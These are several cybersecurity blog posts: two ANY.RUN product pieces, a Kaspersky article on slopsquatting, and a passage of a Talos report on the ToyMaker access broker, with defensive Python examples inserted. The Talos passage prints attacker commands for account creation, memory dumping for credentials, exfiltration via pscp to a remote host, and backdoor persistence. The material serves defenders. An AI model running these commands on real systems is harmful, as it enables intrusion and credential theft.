ANY.RUN Becomes a Gold Winner in Threat Intelligence at Globee Awards 2025  

We are honored to announce that ANY.RUN became a gold winner at the annual Globee Business Awards 2025. The award aims to recognize and celebrate excellence in various industries worldwide, including cybersecurity. 

Our solution, ANY.RUN’s TI Lookup, was named best in the Cyber Threat Intelligence category. We believe that threat intelligence is an essential aspect of ensuring the cybersecurity of organizations, and recognition in this sphere is important to us. 

We’d like to thank you—our readers, partners, users of our products, and all fellow cybersecurity enthusiasts and professionals! The award itself matters less than what it stands for: continuous support from the community and acknowledgement of our high-quality products benefiting thousands of businesses.

What makes TI Lookup special 

Homepage of ANY.RUN’s Threat Intelligence Lookup 

TI Lookup is a search engine that gives users the opportunity to navigate ANY.RUN’s database of fresh and unique information on cyber attacks. It is continuously enriched with extensive data on the latest threats analyzed by 500,000 security professionals and 15,000 companies in ANY.RUN’s Interactive Sandbox.  

As a result, it contains a wealth of indicators and events logged during analyses, including IOCs, IOAs, and IOBs. 

Threat Intelligence Lookup helps you: 

  • Pin existing IOCs to specific threats and discover additional indicators to update your detection capabilities. 
  • Simplify and accelerate threat investigation thanks to the quick response time and access to up-to-date information. 
  • Browse an extensive and regularly updated database of malware samples to get in-depth context on threats. 
  • Increase the efficacy of incident response and triage by working on the tasks as a team. 
  • Monitor evolving threats by subscribing to requests relevant to your company using Search Updates. 



How Threat Intelligence Lookup Benefits SOC Teams

  • Accelerate triage and threat identification: Uncover attacks behind alerts with quick indicator search to block them before they escalate.
  • Improve incident response: Collect an attack’s IOCs, IOAs, IOBs and TTPs, and observe its full execution inside the sandbox for a more accurate response.
  • Strengthen proactive security: Enrich your defense with fresh indicators from the latest samples to prevent attacks, including with auto-updates.
  • Simplify threat hunting: Run proactive searches on indicators found in your network to pin them to actual threats.
  • Enhance forensic analysis: investigate system events and indicators with the help of TI Lookup to discover missing attack details.

Recognition 

It means a lot to us that the expert committee once again expressed their appreciation of our efforts. Previously, our flagship product, ANY.RUN’s Interactive Sandbox, was named a silver winner in the Outstanding Threat Detection and Response category at the Globee Awards 2025. 

About ANY.RUN  

ANY.RUN creates products for malware analysts and SOC teams, such as ANY.RUN’s Interactive Sandbox, TI Lookup and TI Feeds. They help accelerate the work of security specialists of all tiers and benefit businesses by providing helpful insights that allow them to minimize harmful consequences of cyber attacks or avoid them altogether. 

Integrate ANY.RUN’s award-winning services in your organization to strengthen your security →

The post ANY.RUN Becomes a Gold Winner in Threat Intelligence at Globee Awards 2025   appeared first on ANY.RUN’s Cybersecurity Blog.


What is slopsquatting, and how to protect your organization

AI-generated code is already widespread — by some estimates around 40% of new code this past year was written by AI. Microsoft CTO Kevin Scott predicts that in five years this figure will hit 95%. How to properly maintain and protect such code is a burning issue.

Experts still rate the security of AI code as low, as it’s teeming with all the classic coding flaws: vulnerabilities (SQL injections, embedded tokens and secrets, insecure deserialization, XSS), logical defects, outdated APIs, insecure encryption and hashing algorithms, no handling of errors and incorrect user input, and much more. But using an AI assistant in software development adds another unexpected problem: hallucinations. A new study examines in detail how large language models (LLMs) create hallucinations that pop up in AI code. It turns out that some third-party libraries called by AI code simply don’t exist.

Fictitious dependencies in open-source and commercial LLMs

To study the phenomenon of phantom libraries, the researchers prompted 16 popular LLMs to generate 576,000 Python and JavaScript code samples. The models showed varying degrees of imagination: GPT-4 and GPT-4 Turbo hallucinated the least (fabricated libraries were seen in less than 5% of the code samples); next came the DeepSeek models (more than 15%); while CodeLlama 7B was the most fantasy-prone (more than 25%). What’s more, even the parameters used in LLMs to control randomness (temperature, top-p, top-k) are unable to reduce the hallucination rate to insignificant values.

Python code contained fewer fictitious dependencies (16%) than JavaScript (21%). Age is also a contributing factor. Generating code using packages, technologies and algorithms that started trending only this past year results in 10% more non-existent packages.

But the most dangerous aspect of phantom packages is that their names aren’t random, and neural networks reference the same libraries over and over again. That was demonstrated by stage two of the experiment, in which the researchers selected 500 prompts that had provoked hallucinations, and re-ran each of them 10 times. This revealed that 43% of hallucinated packages crop up during each code generation run.

Also of interest is the naming of hallucinated packages: 13% were typical “typos” that differed from a real package name by only one character; 9% were package names borrowed from another ecosystem (for example, npm package names appearing in Python code); and a further 38% were plausibly named but differed more significantly from any real package name.

Meet slopsquatting

All of this can give rise to a new generation of attacks on open-source repositories, which has already been dubbed “slopsquatting” by analogy with typosquatting. In this case, squatting is made possible not by names with typos, but by names from AI slop (low-quality output). Because AI-generated code repeats package names, attackers can run popular models, find recurring hallucinated package names in the generated code, and publish real — and malicious — libraries with these same names. If someone mindlessly installs all packages referenced in the AI-generated code, or the AI assistant installs the packages by itself, a malicious dependency gets injected into the built application, exposing the supply chain to a full-blown attack (ATT&CK T1195.001). This risk is set to rise significantly with the advance of vibe coding — where the programmer writes code by giving instructions to AI with barely a glance at the actual code produced.

Given that all major open-source repositories have been hit by dozens of malicious packages this past year (1, 2), and close to 20,000 malicious libraries have been discovered in the same time period, we can be sure that someone out there will try to industrialize this new type of attack. This scenario is especially dangerous for amateur programmers, as well as for corporate IT departments that solve some automation tasks internally.

How to stop slopsquatting and use AI safely

Guidelines on the safe implementation of AI in development already exist (for example, OWASP, NIST and our own), but these tend to describe a very broad range of measures, many of which are long and complicated to implement. Therefore, we’ve compiled a small subset of easy-to-implement measures to address the specific problem of hallucinated packages:

  • Make source-code scanning and static security testing part of the development pipeline. All code, including AI-generated code, must meet clear criteria: no embedded tokens or other secrets, use of known and pinned versions of libraries and other dependencies, and so forth. These checks integrate well into the CI/CD cycle — for example, with the help of our Kaspersky Container Security.
  • Introduce additional AI validation cycles where the LLM checks its own code for errors, to reduce the number of hallucinations. In addition, the model can be prompted to analyze the popularity and usability of each package referenced in a project. Using a prebuilt database of popular libraries to fine-tune the model and allow retrieval-augmented generation (RAG) also reduces the number of errors. By combining all these methods, the authors of the study were able to cut the number of hallucinated packages to 2.4% for DeepSeek and 9.3% for CodeLlama. Unfortunately, both figures are too far off zero for these measures to suffice.
  • Ban the use of AI assistants in coding critical and trusted components. For non-critical tasks where AI-assisted coding is allowed, assign a component developer to build a code review process. For the review, there needs to be a checklist tailored to AI code.
  • Draw up a fixed list of trusted dependencies. AI assistants and their flesh-and-blood users must have limited scope to add libraries and dependencies to the code — ideally, only libraries from the organization’s internal repository, tested and approved in advance, should be available.
  • Train developers. They must be well versed in AI security in general, as well as in the context of AI use in code development.
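As an added example (not from the Kaspersky post or the study it cites), the following script applies the “fixed list of trusted dependencies” measure to a Python file: it extracts the top-level imports, checks each third-party name against an allowlist of vetted packages, and separately flags names that are one edit away from an approved package, the “typo” class of hallucination the study describes. The allowlist, the import-to-distribution map and the sample AI-generated source are constructed for the illustration.

```python
"""
Screen the third-party packages an AI-generated Python file imports against an
allowlist of approved packages. Names that are absent are 'unknown'; names one
character away from an approved package are 'near-miss' (typosquat/slopsquat
suspects). Allowlist and sample source are constructed for the example.
"""
import ast
import sys

# Constructed allowlist: packages the organisation has vetted and mirrors internally.
APPROVED_PACKAGES = {"requests", "numpy", "pandas", "cryptography", "pyyaml", "boto3"}

# Import names that differ from the distribution name (constructed, partial).
IMPORT_TO_DIST = {"yaml": "pyyaml"}

# Standard-library modules never need a dependency. sys.stdlib_module_names exists
# from Python 3.10; the small fallback set keeps the example running on older versions.
STDLIB = set(getattr(sys, "stdlib_module_names", ())) | {"os", "sys", "re", "json", "ast"}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot one-character typo/slop names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def top_level_imports(source: str) -> set:
    """Collect the top-level module names a Python source file imports."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                names.add(alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.level == 0 and node.module:
            names.add(node.module.split(".")[0])
    return names


def screen_dependencies(source: str) -> dict:
    """
    Map each third-party import to a verdict:
      'approved'          - on the allowlist
      'near-miss:<name>'  - one edit away from approved package <name>
      'unknown'           - not approved; must not be installed without review
    """
    verdicts = {}
    for mod in sorted(top_level_imports(source)):
        if mod in STDLIB:
            continue
        dist = IMPORT_TO_DIST.get(mod, mod).lower()
        if dist in APPROVED_PACKAGES:
            verdicts[mod] = "approved"
            continue
        close = sorted(p for p in APPROVED_PACKAGES if edit_distance(dist, p) == 1)
        verdicts[mod] = f"near-miss:{close[0]}" if close else "unknown"
    return verdicts


# Constructed sample of AI-generated code: genuine imports, one package name with
# a one-character typo, and one plausible-sounding package that does not exist.
SAMPLE_AI_CODE = """
import os
import requests
import numpy as np
import panda as pd
from fastjsonsafe import dumps
"""

if __name__ == "__main__":
    for name, verdict in screen_dependencies(SAMPLE_AI_CODE).items():
        print(f"{name:14} {verdict}")
```

Anything other than “approved” should fail the pipeline step rather than merely warn: an “unknown” name is exactly the gap a slopsquatted package would fill, and a “near-miss” is the classic typosquat. Resolving the import name through the organisation’s internal package index rather than the public registry closes the remaining path by which a hallucinated name could still be installed.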

Kaspersky official blog

How Threat Intelligence Feeds Help During Incident Response

Threat Intelligence Feeds combine curated threat data with automation: real-time indicators, machine-speed decisions, and a global view of attacker activity, applied to stop threats before they become incidents. 

ANY.RUN’s TI Feeds are structured, continuously updated streams of fresh threat data. They contain network-based IOCs (IP addresses, domain names, and URLs) and are enriched with additional context-providing indicators such as file hashes and ports. 

The Feeds strengthen the detection capabilities of security systems and enable SOC teams to quickly mitigate attacks, including emerging malware and persistent threats. 

Source, Structure, Benefits of ANY.RUN’s TI Feeds 

You can download a free sample of Threat Intelligence Feeds in STIX or MISP format

Threat Intelligence Feeds provided by ANY.RUN are sourced from public analysis sessions in our cloud-based sandbox, where users including the SOC teams of 15,000 organizations from a variety of industries detonate and dissect real-world malware samples.  

The indicators are pre-processed using proprietary algorithms and whitelists to minimize false positives, ensuring high accuracy and relevance. Each indicator of compromise is enriched with contextual metadata providing deeper insights into the threat.

This means that each IP, URL, or domain in TI Feeds is enriched with:  

  • External references: Links to relevant sandbox sessions. 
  • Label: Name of the malware family or campaign. 
  • Detection timestamps: First/last seen dates provide a timeline to understand whether a threat is ongoing or historical. 
  • Related objects: IDs of files and network indicators related to the IOC. 
  • Score: Value representing the severity level of the IOC. 

ANY.RUN’s TI Feeds come in STIX or MISP format with the indicator types of your choice. Request a test sample to start using actionable IOC data in your security operations. ANY.RUN also runs a dedicated MISP instance that you can synchronize your own server with or connect to your security solutions. To get started, contact our team via this page.

By delivering insights into threats and their indicators of compromise (IOCs), TI Feeds support organizations across multiple phases of incident response: Incident Triage, Threat Hunting, and Post-Incident Analysis. 



Incident Triage 

Incident Triage involves assessing and prioritizing security alerts to determine their severity and potential impact. This must be done quickly and yet precisely, saving analysts from wasting time on false positives and highlighting critical true positives.  

TI Feeds streamline this process by providing contextual data to validate and enrich alerts, enabling faster and more accurate decision-making.  

TI Feeds for Triage: 

  • Correlation with Known Threats: Feeds supply IOCs (e.g., malicious IPs, domains, file hashes) that can be cross-referenced with incoming alerts to confirm whether an incident is legitimate or a false positive. 
  • Prioritization: Feeds provide threat severity scores and context (e.g., association with a known ransomware group) to help security teams sort out incidents that pose the greatest risk. 
  • Automation: Integration with Security Information and Event Management (SIEM) systems or Security Orchestration, Automation, and Response (SOAR) platforms allows TI Feeds to automatically enrich alerts with relevant threat data, reducing manual effort. 

Example 

A financial institution receives an alert from its intrusion detection system (IDS) about a suspicious outbound connection to an unfamiliar IP address. A TI Feed identifies the IP as part of a command-and-control (C2) server linked to Lynx ransomware. Armed with this information, the team prioritizes the incident as high-severity, immediately isolates the affected endpoint, and escalates it for further investigation, avoiding a potential data breach. 
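The following is an added example (not ANY.RUN code) of the triage workflow above in the form a SIEM enrichment step would take: it ingests a STIX 2.1 indicator bundle, indexes the network observables in the patterns, and enriches IDS alerts whose destination matches one. The bundle, its “x_score” custom property and the IDS log lines are constructed for the illustration; they are not ANY.RUN’s actual feed schema, and the priority threshold is an assumed value.

```python
"""
Ingest a STIX 2.1 indicator bundle, index the network observables it carries,
and enrich IDS/firewall alerts whose destination is a known indicator.
The bundle, the 'x_score' custom property and the log lines are constructed.
"""
import json
import re

# Constructed STIX 2.1 bundle with two network indicators. Only the fields this
# script reads are populated; 'x_score' is an assumed custom property.
STIX_BUNDLE = json.dumps({
    "type": "bundle",
    "id": "bundle--00000000-0000-4000-8000-000000000001",
    "objects": [
        {
            "type": "indicator",
            "spec_version": "2.1",
            "id": "indicator--00000000-0000-4000-8000-000000000002",
            "pattern_type": "stix",
            "pattern": "[ipv4-addr:value = '203.0.113.45']",
            "labels": ["malicious-activity", "ransomware-c2"],
            "name": "Ransomware C2 (constructed)",
            "valid_from": "2025-04-01T00:00:00Z",
            "x_score": 90,
        },
        {
            "type": "indicator",
            "spec_version": "2.1",
            "id": "indicator--00000000-0000-4000-8000-000000000003",
            "pattern_type": "stix",
            "pattern": "[domain-name:value = 'update-check.example.net']",
            "labels": ["malicious-activity", "phishing"],
            "name": "Phishing landing domain (constructed)",
            "valid_from": "2025-04-03T00:00:00Z",
            "x_score": 60,
        },
    ],
})

# Matches single-comparison STIX patterns such as [ipv4-addr:value = '1.2.3.4'].
_PATTERN_RE = re.compile(r"^\[(ipv4-addr|domain-name|url):value\s*=\s*'([^']+)'\]$")


def index_indicators(bundle_json: str) -> dict:
    """Return {observable_value: indicator_metadata} for the supported pattern types."""
    index = {}
    for obj in json.loads(bundle_json)["objects"]:
        if obj.get("type") != "indicator" or obj.get("pattern_type") != "stix":
            continue
        match = _PATTERN_RE.match(obj["pattern"])
        if not match:
            continue  # compound patterns need a real STIX pattern parser
        obs_type, value = match.groups()
        index[value.lower()] = {
            "type": obs_type,
            "id": obj["id"],
            "labels": obj.get("labels", []),
            "name": obj.get("name", ""),
            "valid_from": obj.get("valid_from"),
            "score": obj.get("x_score"),
        }
    return index


# Constructed IDS alert lines: timestamp, source host, destination, destination port.
SAMPLE_ALERTS = [
    "2025-04-10T09:14:02Z host=WS-0142 dst=203.0.113.45 dport=443",
    "2025-04-10T09:14:09Z host=WS-0142 dst=198.51.100.7 dport=443",
    "2025-04-10T09:15:30Z host=WS-0077 dst=update-check.example.net dport=80",
]

_LOG_RE = re.compile(r"^(\S+) host=(\S+) dst=(\S+) dport=(\d+)$")


def enrich_alerts(log_lines, index: dict) -> list:
    """Attach feed context to every alert whose destination is a known indicator."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        ts, host, dst, dport = m.groups()
        meta = index.get(dst.lower())
        if meta is None:
            continue  # no feed match: stays a low-context alert for the analyst
        hits.append({
            "timestamp": ts,
            "host": host,
            "destination": dst,
            "dport": int(dport),
            "indicator_id": meta["id"],
            "labels": meta["labels"],
            "score": meta["score"],
            # Triage priority derived from the feed's score (assumed threshold of 80).
            "priority": "high" if (meta["score"] or 0) >= 80 else "medium",
        })
    return hits


if __name__ == "__main__":
    ioc_index = index_indicators(STIX_BUNDLE)
    for hit in enrich_alerts(SAMPLE_ALERTS, ioc_index):
        print(json.dumps(hit))
```

The enriched record carries the indicator ID and the sandbox-derived labels, which is what lets the analyst jump from the alert to the source analysis; in production the “valid_from” field should also be checked against the alert time so that stale indicators are not used to escalate new alerts.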

Business Impact

  • Reduces Mean Time to Detect (MTTD) by quickly validating alerts. 
  • Minimizes resource waste on false positives, allowing focus on critical incidents. 
  • Enhances compliance by ensuring timely response to high-risk threats. 

ANY.RUN’s TI Feeds are updated every few hours, pulling fresh IOCs from over 16,000 daily public tasks submitted by its community. This near real-time delivery ensures organizations can respond to emerging threats almost immediately after they are detected in the wild. 

Threat Hunting

  • Enriching Network Data: Feeds supply IOCs that can be correlated with network logs, endpoint data, or user activity to uncover anomalies. 
  • Guiding Hypothesis Development: TI Feeds enriched with contextual data provide the basis for further investigation of the malware, attack, or actor. Able to move from IOCs to TTPs, hunters can craft targeted hypotheses about potential threats. 
  • Proactive Defense: By highlighting emerging threats (e.g., new exploit kits or phishing campaigns), TI Feeds allow hunters to search for related activity before an attack fully unfolds. 

Example 

A retail company’s threat-hunting team learns from their TI Feed about a new phishing campaign targeting e-commerce platforms with a specific malicious domain and a unique file hash for a ransomware payload. The team uses this intelligence to search their network logs for any connections to the domain or instances of the file hash.  

They discover a single endpoint that attempted to access the domain but was blocked by the firewall. Further investigation reveals a phishing email that evaded initial detection. The team neutralizes the threat by quarantining the endpoint and updating email filters, preventing a potential ransomware outbreak. 

Business Impact 

  • Prevents incidents by identifying threats before they cause harm. 
  • Strengthens proactive security posture, reducing the likelihood of successful attacks. 
  • Protects brand reputation by avoiding customer data exposure. 

Post-Incident Analysis 

Post-Incident Analysis focuses on understanding the root cause of an incident, assessing its impact, and improving future defenses. TI Feeds provide critical context to reconstruct the attack, identify gaps in security, and build remediation strategies.  

ANY.RUN’s TI Feeds draw from a vast dataset generated by a diverse community of 500,000 analysts and teams of 15,000 enterprises. This scale ensures broad coverage of threats, including zero-day exploits and emerging malware, tailored to various industries. It helps teams map incidents to global trends. 

TI Feeds in Post-Incident Analysis 

  • Attack Reconstruction: Feeds supply detailed intelligence on threat actors and associated IOCs, helping teams trace the attack’s origin and progression. 
  • Gap Identification: By comparing the incident to known threat patterns, TI Feeds reveal weaknesses in defenses (e.g., unpatched vulnerabilities or misconfigured systems). 
  • Retrospective Analysis: Newly published threat intel can be used to re-analyze old data. This helps identify if earlier, undetected activity was related to a known campaign. 

Example 

After a manufacturing company suffers a data breach involving stolen intellectual property, the incident response team uses their TI Feed to analyze the attack. The feed reveals that the breach was caused by a spear-phishing campaign linked to a nation-state actor known for targeting industrial sectors. 

Since ANY.RUN’s Feeds provide links to sandbox analyses of the phishing samples, the team can extract the attacker’s TTPs, including the use of a specific exploit in an unpatched software version and a custom PowerShell script for data exfiltration.  

The team can now patch the vulnerability, deploy new endpoint detection rules to flag similar scripts, and conduct employee training on recognizing spear-phishing emails. Additionally, the feed’s geopolitical context prompts the company to enhance monitoring of critical R&D systems. 

Business Impact 

  • Reduces Mean Time to Recover (MTTR) by guiding effective remediation.
  • Strengthens long-term resilience by addressing root causes and vulnerabilities.
  • Supports compliance by documenting lessons learned and mitigation steps for audits.

Ways TI Feeds Support Organizational Efficiency 

ANY.RUN’s TI Feeds are designed for easy integration with SIEM, SOAR, firewalls, and other security platforms, supporting formats like STIX and MISP. This ensures automated ingestion of IOCs, streamlining workflows and enhancing existing tools’ effectiveness. 

By integrating real-time, high-quality threat data with automation, TI Feeds enhance organizational resilience, reduce risks, and support informed decision-making. Their most important benefits that align with business objectives and KPIs are:  

1. Early Detection Capabilities 

TI Feeds enable identification of potential risks before they escalate into costly incidents. By identifying malware or phishing campaigns at their inception, TI Feeds help businesses avoid disruptions, protect customer trust, and safeguard revenue streams. 


Learn more about ANY.RUN's TI Feeds

Learn more about ANY.RUN’s TI Feeds

See what types of indicators are available in our feeds with examples



2. Faster Response Times 

TI Feeds significantly shorten the time to identify and mitigate threats by correlating threat data with ongoing incidents. Faster response times contribute to KPIs like Mean Time to Detect (MTTD) and Mean Time to Respond (MTTR), which are critical for minimizing the impact of security breaches.  

Addressing breaches promptly reduces financial losses, protects brand reputation, and ensures compliance with regulatory requirements (e.g., GDPR, CCPA).

3. Informed Decision-Making  

TI Feeds give organizations actionable intelligence, enabling data-driven decisions that align cybersecurity strategies with business goals. A clear picture of the threat landscape helps business leaders prioritize investments in security controls, employee training, or third-party partnerships, driving long-term resilience and competitive advantage. 

4. Proactive Defense 

TI Feeds shift organizations from reactive to proactive cybersecurity, anticipating threats and preventing incidents before they occur. This improves KPIs such as the percentage of prevented incidents, reduction in remediation costs, and increased system uptime. 

Conclusion 

ANY.RUN’s Threat Intelligence Feeds deliver significant value by combining high-quality, low-noise data, near real-time updates, a massive community-driven dataset, seamless integration, and unique sandbox-driven insights.  

These benefits directly enhance Incident Triage by speeding up alert validation, Threat Hunting by enabling proactive threat discovery, and Post-Incident Analysis by providing detailed context for remediation. 

By integrating TI Feeds into incident response workflows, organizations can minimize damage, enhance security posture, and align cybersecurity efforts with business objectives.  

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Request trial of ANY.RUN’s services to test them in your organization → 

The post How Threat Intelligence Feeds Help During Incident Response appeared first on ANY.RUN’s Cybersecurity Blog.


Introducing ToyMaker, an Initial Access Broker working in cahoots with double extortion gangs

  • In 2023, Cisco Talos discovered an extensive compromise in a critical infrastructure enterprise consisting of a combination of threat actors.
  • From initial access to double extortion, these actors slowly and steadily compromised a multitude of hosts in the network using a combination of various dual-use remote administration, SSH and file transfer tools. 
  • The Initial Access Broker (IAB), whom Talos calls “ToyMaker” and assesses with medium confidence is a financially motivated threat actor, exploits vulnerable systems exposed to the internet. They deploy their custom-made backdoor we call “LAGTOY” and extract credentials from the victim enterprise. LAGTOY can be used to create reverse shells and execute commands on infected endpoints.
  • A compromise by LAGTOY may result in access being handed over to a secondary threat actor. Specifically, we’ve observed ToyMaker hand over access to Cactus, a double extortion gang that employed its own tactics, techniques and procedures (TTPs) to carry out malicious actions across the victim’s network.

Turnaround time from ToyMaker to Cactus


Intrusion analysis across various endpoints enabled Talos to build a timeline of events from initial compromise to access handover to subsequent secondary malicious activity. The following is a high-level timeline of events:

Day of activity               Type of malicious activity                                       Threat actor

Initial compromise            User enumeration; preliminary recon; fake user creation;         ToyMaker
                              credential extraction via Magnet RAM Capture

+2 day(s)                     Deploy LAGTOY implant                                            ToyMaker

(Lull in activity for 3 weeks)

+3 weeks (Cactus day 0)       Endpoint enumeration                                             Cactus

Cactus day 2                  Server and file enumeration; indicator removal                   Cactus

Cactus day 2 and 3            Proliferation through enterprise                                 Cactus

Cactus day 4                  Archiving sensitive data for exfiltration (extortion)            Cactus

Cactus day 8                  Remote management tools deployment (eHorus, RMS, AnyDesk);       Cactus
                              OpenSSH connections

Cactus day 12                 Malicious account creation for ransomware deployment             Cactus

Cactus day 12                 Delete volume shadow copies; boot recovery modifications         Cactus

ToyMaker’s TTPs and tools

After the initial compromise, ToyMaker performed preliminary reconnaissance, credential extraction and backdoor deployment within the span of a week, after which they took no further activity. Talos did not observe any victim-specific data exfiltration nor did we observe attempts to discover and pivot to other valuable endpoints. After a lull in activity of approximately three weeks, we observed the Cactus ransomware group make its way into the victim enterprise using credentials stolen by ToyMaker. Based on the relatively short dwell time, the lack of data theft and the subsequent handover to Cactus, it is unlikely that ToyMaker had any espionage-motivated ambitions or goals.

Talos therefore assesses with medium confidence that ToyMaker is a financially-motivated Initial Access Broker (IAB) who acquires access to high value organizations and then transfers that access to secondary threat actors who usually monetize the access via double extortion and ransomware deployment.

The disparity in TTPs and timelines between the initial access conducted by ToyMaker and the secondary activity conducted by Cactus requires that both threats be modeled separately. However, it is imperative to establish relationships between the two. In fact, similar connections need to be incorporated into paradigms used for threat modeling any suspected IABs. In subsequent blogs, Talos will propose a new methodology for modeling and tracking compartmentalized and yet somewhat connected threats.

ToyMaker has been known to use a custom malware family — a backdoor Talos tracks as LAGTOY. ToyMaker usually infiltrates an organization’s environment by successfully exploiting a known vulnerability in an unpatched internet-facing server. Successful compromise almost immediately results in rapid reconnaissance of the system:

COMMAND                          INTENT

whoami                           System Information Discovery [T1082]
net user
net localgroup
net group
net user Administrator
nltest /domain_trusts
net group Enterprise Admins

ipconfig /all                    Gather Victim Network Information [T1590]

Reconnaissance is followed by the creation of a fake user account named ‘support’:

COMMAND                                        INTENT

net user support Sup0rtadmin /add              Create Account [T1136]
net localgroup administrators support /add

Following this, the actor starts an SSH listener on the endpoint using the Windows OpenSSH package (sshd.exe). The endpoint then receives a connection from another infected host on the network that creates a binary named ‘sftp-server.exe’ which is the SFTP server module of OpenSSH. sftp-server.exe then connects to a remote host to download the Magnet RAM Capture executable:

COMMAND                                  INTENT

MRCv120.exe /accepteula /silent /go      Extract credentials (OS Credential Dumping) [T1003]

Magnet RAM Capture is a freely available forensics tool used to obtain a memory dump of the host, from which credentials can be harvested. This tactic likely explains the high number of compromised systems that Talos identified during this campaign. 

The memory dump is then archived using the 7za.exe archive creation command [T1560]:

7za.exe a -p -mmt2 -mhe 1.7z 1.r

Subsequently the archive is exfiltrated from the endpoint using PuTTY’s SCP utility (pscp) [T1048]:

pscp.exe -P 53 1.7z root@<Remote_IP>:/root

Once the attackers have obtained the memory dump, they use the sftp-server.exe connection again to download and execute a custom made reverse shell implant we’re calling “LAGTOY”.

LAGTOY is persisted on the system by creating a service for it [T1543]:

sc create WmiPrvSV start= auto error= ignore binPath= C:\Program Files\Common Files\Services\WmiPrvSV.exe

The implant reaches out to the C2 server configured in it to receive commands to execute on the endpoint such as:

COMMAND            INTENT

tasklist           System Information Discovery [T1082]
quser              System Information Discovery [T1082]
ipconfig /all      System Information Discovery [T1082]

LAGTOY – ToyMaker’s staple backdoor

LAGTOY is a simple yet effective implant. The backdoor is called HOLERUN by Mandiant. It is meant to periodically reach out to the hard-coded C2 server and accept commands to execute on the infected endpoint. It is installed on the system as part of a service and contains rudimentary anti-debugging checks before initiating connections to the C2.

LAGTOY execution logic.

As an anti-debug technique, the malware registers a custom unhandled exception filter via kernel32!SetUnhandledExceptionFilter(). When an unhandled exception is subsequently raised, a debugger attached to the process receives it first and the custom filter is never invoked. Therefore, if control does reach the registered filter, the process is not running under a debugger.


LAGTOY is intended to run on the infected system as a service with the name ‘WmiPrvSV’. 


Both the C2 IP address and the protocol port are hardcoded into LAGTOY.  The communication is done over port 443 with a raw socket — not using TLS as one would expect on this TCP port.
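Because LAGTOY talks to its C2 on TCP/443 without TLS, the first client payload of such a flow will not be a TLS ClientHello, which is a cheap network-level check to run regardless of the C2 address. The script below is an added example (not from the Talos report): it validates the TLS record header of the first client-to-server bytes of a port-443 flow and reports flows that fail. The flow samples are constructed, and the plain-text LAGTOY payload bytes are invented for the example; they are not a real signature.

```python
"""
Classify the first client-to-server payload of a TCP/443 flow as a TLS
ClientHello or not. Flows that fail are candidates for non-TLS C2 on 443.
Flow samples are constructed; the LAGTOY-style payload is invented.
"""


def looks_like_tls_client_hello(payload: bytes) -> tuple:
    """
    Check the TLS record header (RFC 8446 section 5.1) and the first handshake byte.
    Returns (is_tls, reason).
    """
    if len(payload) < 6:
        return False, "too short for a TLS record header"
    content_type, major, minor = payload[0], payload[1], payload[2]
    if content_type != 0x16:
        return False, f"record type 0x{content_type:02x} is not handshake (0x16)"
    if major != 0x03 or minor not in (0x00, 0x01, 0x02, 0x03, 0x04):
        return False, f"legacy record version {major}.{minor} is not an SSL/TLS version"
    record_len = int.from_bytes(payload[3:5], "big")
    if record_len == 0 or record_len > 16384 + 2048:  # 2^14 plus permitted expansion
        return False, f"implausible record length {record_len}"
    if payload[5] != 0x01:
        return False, f"handshake type 0x{payload[5]:02x} is not ClientHello (0x01)"
    return True, "TLS ClientHello"


# Constructed flows: (client, server:port, first client payload).
SAMPLE_FLOWS = [
    # Plausible ClientHello prefix: handshake record, legacy version 3.1,
    # record length 0x00c0, handshake type 0x01, client_version 3.3, then padding.
    ("10.0.0.15", "93.184.216.34:443",
     bytes.fromhex("160301 00c0 01 0000bc 0303") + b"\x00" * 20),
    # Plain-text bytes on 443, modelled on the report's description of LAGTOY
    # (payload contents invented for the example).
    ("10.0.0.15", "203.0.113.9:443", b"#ps tasklist\r\n"),
    # A first segment too short to carry a record header.
    ("10.0.0.22", "203.0.113.9:443", b"\x16\x03"),
]


def flag_non_tls_443(flows) -> list:
    """Return the port-443 flows whose first payload is not a TLS ClientHello."""
    findings = []
    for src, dst, payload in flows:
        if not dst.endswith(":443"):
            continue
        ok, reason = looks_like_tls_client_hello(payload)
        if not ok:
            findings.append({"src": src, "dst": dst, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in flag_non_tls_443(SAMPLE_FLOWS):
        print(f"{f['src']} -> {f['dst']}: {f['reason']}")
```

In a sensor this check runs on the first data segment after the three-way handshake; the “too short” case should be retried once more data arrives rather than alerted on immediately, and a flow that fails the header check but ends quickly is still worth recording, since LAGTOY’s beacons are short command exchanges rather than long sessions.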

Command and control communication.

The C2 sends LAGTOY short administration codes:

  • ‘#pt’: Stop the service.
  • ‘#pd’: Break out of the current execution chain and check whether the service has been stopped. If it has, sleep for a fixed period and then re-initiate the connection to the C2.
  • ‘#ps’: Create the specified process/command.
  • If the code does not begin with ‘#’, execute the provided command or process name on the endpoint directly.

Command recognition logic of LAGTOY.

Compared with the sample discovered by Mandiant in 2022, this sample adds the ‘#ps’ handler, which creates a process for the supplied command. 

Sample in 2022 does not have the ‘#ps’ parameter.

Time-based execution 

LAGTOY uses a unique time-based logic to decide whether it needs to execute commands or sleep for a specific period. Talos assesses with high confidence that this logic is custom-built and unique to the LAGTOY family of implants.

LAGTOY is able to process three commands from the C2 with a Sleep interval of 11000 milliseconds between them. During its beaconing cycle it will record the last successful time of C2 communications and successful command execution. If the commands issued by the C2 have been failing for at least 30 minutes then the implant will send a message to the C2 informing it of the failure to execute commands.

LAGTOY has a watchdog routine embedded. If it has been running for a cumulative time of more than 60 minutes, it will stop executing commands and then check if the service has been stopped. If the service is still active then the implant will reinitiate connections to the C2.

Overall timing and C2 communications logic of LAGTOY.

ToyMaker gives way to ransomware cartels

Almost a month after ToyMaker established access to the victim enterprise, the actor passed on the access to a secondary threat actor, a Cactus ransomware affiliate, who primarily conducts ransomware and double extortion operations.

